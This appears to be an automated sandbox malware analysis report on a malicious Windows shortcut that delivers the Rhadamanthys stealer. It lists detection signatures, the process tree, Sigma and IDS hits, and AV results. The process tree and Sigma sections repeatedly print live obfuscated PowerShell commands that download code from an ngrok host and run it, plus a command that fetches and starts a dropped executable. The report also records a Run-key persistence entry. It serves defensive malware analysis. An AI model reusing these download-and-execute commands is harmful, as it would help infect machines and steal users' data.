Windows Analysis Report
751ietQPnX.lnk

Overview

General Information

Sample name: 751ietQPnX.lnk
renamed because original name is a hash value
Original sample name: da4b8840562135313b4af52637a248fbab262a37fb041e12a9b93e5cda32ae2f.lnk
Analysis ID: 1572663
MD5: 80088bacc66572cd6744243cf62be2ba
SHA1: 595caf1d649749b0da44866cd5c13afaf21f5626
SHA256: da4b8840562135313b4af52637a248fbab262a37fb041e12a9b93e5cda32ae2f
Tags: Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • cmd.exe (PID: 2484 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7148 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • msedge.exe (PID: 7356 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 7620 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1976,i,479339844209240994,6957522588551196104,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 8532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8592 cmdline: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; " MD5: 04029E121A0CFA5991749937DD22A1D9)
          • msedge.exe (PID: 5220 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1027599800.pdf MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 6248 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=2128,i,4843216233513846130,16606171289243587075,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • 854113748.exe (PID: 6272 cmdline: "C:\Users\user\AppData\Local\Temp\854113748.exe" MD5: EB40135D3E0FE985A9E09970DC09A499)
            • 854113748.exe (PID: 416 cmdline: "C:\Users\user\AppData\Local\Temp\854113748.exe" MD5: EB40135D3E0FE985A9E09970DC09A499)
              • fontdrvhost.exe (PID: 8100 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
                • fontdrvhost.exe (PID: 7376 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
                  • WerFault.exe (PID: 8776 cmdline: C:\Windows\system32\WerFault.exe -u -p 7376 -s 148 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 908 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 444 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7496 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7628 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8348 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6340 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8388 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6528 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 8944 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 8964 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7120 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • msedge.exe (PID: 6804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=3404 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2696 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8376 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7412 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6708 --field-trial-handle=2280,i,12331976046944601960,4867582462310201674,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 7560 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8492 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1108 --field-trial-handle=1948,i,14212657581130048292,735076137658541707,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 8216 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5600 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1996,i,241946409549104947,2634262981403856413,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

Malware family (Malpedia)

Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

No configs have been found

Source | Rule | Description | Author | Strings
0000001E.00000003.2342679249.00000000033C0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000001D.00000002.2353583074.0000000000A10000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source | Rule | Description | Author | Strings
29.3.854113748.exe.2ff0000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
30.3.fontdrvhost.exe.58b0000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
29.3.854113748.exe.2dd0000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
30.3.fontdrvhost.exe.5690000.6.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
30.3.fontdrvhost.exe.5690000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

System Summary

Source: File created, Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7148, TargetFilename: C:\Users\user\AppData\Local\Temp\1462386273.bat
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\854113748.exe, ProcessId: 6272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PerfectouinVans
Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7148, TargetFilename: C:\Users\user\AppData\Local\Temp\1462386273.bat
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; ", CommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8532, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 
'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; ", ProcessId: 8592, ProcessName: powershell.exe
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2484, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), ProcessId: 7148, ProcessName: powershell.exe
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), ProcessId: 2484, ProcessName: cmd.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2484, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing), ProcessId: 7148, ProcessName: powershell.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7496, ProcessName: svchost.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T18:41:30.742148+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49735 | 162.125.69.18 | 443 | TCP
2024-12-10T18:41:45.354267+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49790 | 162.125.69.18 | 443 | TCP
2024-12-10T18:42:17.083476+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 162.213.210.250 | 6499 | 192.168.2.4 | 49834 | TCP

AV Detection

Source: C:\Users\user\AppData\Local\Temp\854113748.exe, ReversingLabs: Detection: 26%
Source: 751ietQPnX.lnk, ReversingLabs: Detection: 18%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: 751ietQPnX.lnk, Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\AppData\Local\Temp\854113748.exe, Unpacked PE file: 26.2.854113748.exe.2220000.2.unpack
Source: unknown, HTTPS traffic detected: 18.192.31.165:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 18.192.31.165:443 -> 192.168.2.4:49800 version: TLS 1.2
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2278426840.000002336DB4B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000010.00000002.2282838688.0000023B6EE9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: 854113748.exe, 0000001D.00000003.2340149595.0000000000F20000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340267249.0000000002E50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345418878.0000000005710000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345179644.00000000039C0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: 854113748.exe, 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340562486.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb= source: powershell.exe, 00000010.00000002.2278426840.000002336DB5F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: 854113748.exe, 0000001D.00000003.2339382233.0000000002FC0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339181691.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.2277453926.000002336DB34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: 854113748.exe, 0000001D.00000003.2339895618.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339702134.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344912074.0000000005830000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344721421.0000000005690000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb`Il source: 854113748.exe, 0000001A.00000000.2141718264.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371490999.0000000002420000.00000004.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: ntdll.pdbUGP source: 854113748.exe, 0000001D.00000003.2339382233.0000000002FC0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339181691.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: 854113748.exe, 0000001D.00000003.2339895618.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339702134.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344912074.0000000005830000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344721421.0000000005690000.00000004.00000001.00020000.00000000.sdmp
